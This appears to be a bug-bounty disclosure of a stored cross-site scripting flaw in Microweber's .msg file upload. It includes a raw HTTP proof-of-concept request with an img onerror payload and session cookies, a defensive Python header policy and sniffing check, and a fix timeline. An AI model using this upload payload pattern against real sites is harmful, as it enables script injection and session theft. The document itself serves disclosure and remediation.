Cross-site scripting - Stored via upload ".msg" file in microweber/microweber

Valid

Reported on

Apr 28th 2022


Description

When a user uploads a file whose .msg extension is on the upload allow-list and then requests that file, the server does not send a Content-Type header in its response, so the browser treats the file as text/html and executes any JavaScript it contains.

Proof of Concept

POST /microweber/plupload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------28771568286742411163240611272
Content-Length: 613
Origin: http://localhost
Connection: close
Referer: http://localhost/microweber/admin/view:modules/load_module:users/edit-user:2
Cookie: lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; laravel_session=BnjV1FJreD5RFBkjkvb8pXOYFRSigS9UEohOssK0; csrf-token-data=%7B%22value%22%3A%22sgvKF9TERgDm9O13FiWEGxRvQFNAI8JvpRtqKnGo%22%2C%22expiry%22%3A1651144709625%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CZoRHz4Lp6Dw1kGoNmNjw8Bl9OnQxW9tsICXbPm45GY8PWB1MSkbLXzmWI5cV%7C%242y%2410%242mEkAOazLSPOHDj8x7C8ee06lkvn6Shka.Hdp6wt2g4k.j1maqtBS; back_to_admin=http%3A//localhost/microweber/admin/view%3Amodules/load_module%3Ausers/edit-user%3A2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="name"

exploit.msg
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="chunk"

0
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="chunks"

1
-----------------------------28771568286742411163240611272
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror=alert(window.origin) />
-----------------------------28771568286742411163240611272--

PoC Image

(Three screenshots were attached to the original report; they are not reproduced here.)

Impact

This vulnerability allows arbitrary JavaScript to be executed in the victim's browser, which can be used to steal the user's cookies, perform HTTP requests, read the content of same-origin pages, and so on.
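
As an added example (not part of this report or of Microweber's own code), the Python below shows the header policy that closes this class of issue: every stored upload is served with an explicit Content-Type from an allow-list, with nosniff, and as a download unless it is an image. It also includes a check that flags a response for an uploaded file that a browser could sniff as HTML; the extension-to-MIME tables are assumptions made for the example.

```python
from typing import Optional

# Extensions the application may render inline. Constructed allow-list for
# this example, not Microweber's own configuration.
INLINE_TYPES = {"png": "image/png", "jpg": "image/jpeg",
                "jpeg": "image/jpeg", "gif": "image/gif"}
# Allow-listed extensions that must never be rendered by the browser.
DOWNLOAD_TYPES = {"msg": "application/vnd.ms-outlook",
                  "pdf": "application/pdf", "zip": "application/zip"}


def response_headers_for(filename: str) -> Optional[dict]:
    """Headers to send for a stored upload, or None to refuse serving it."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in INLINE_TYPES:
        return {"Content-Type": INLINE_TYPES[ext],
                "X-Content-Type-Options": "nosniff",
                "Content-Disposition": "inline"}
    if ext in DOWNLOAD_TYPES:
        # Strip characters that could break out of the quoted filename.
        safe_name = "".join(c for c in filename if c.isprintable() and c != '"')
        return {"Content-Type": DOWNLOAD_TYPES[ext],
                "X-Content-Type-Options": "nosniff",
                "Content-Disposition": f'attachment; filename="{safe_name}"'}
    return None  # unknown extension: do not serve


def sniffing_risk(headers: dict) -> Optional[str]:
    """Explain why a response for a user upload could run as HTML, else None."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if not ctype:
        # This is the condition in the report: the browser sniffs the body.
        return "no Content-Type: browser will sniff the body"
    if ctype in ("text/html", "application/xhtml+xml"):
        return "upload served as HTML"
    if h.get("x-content-type-options", "").lower() != "nosniff":
        return "missing X-Content-Type-Options: nosniff"
    return None
```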

We are processing your report and will contact the microweber team within 24 hours. a month ago
We have contacted a member of the microweber team and are waiting to hear back 25 days ago
Peter Ivanov modified the Severity from High to Low 25 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability 25 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 56c2db 25 days ago
Peter Ivanov has been awarded the fix bounty
Files.php#L1161 has been validated
Nhien.IT
22 days ago

Researcher


Hi @admin @maintainer,

Can I get CVE for this report?
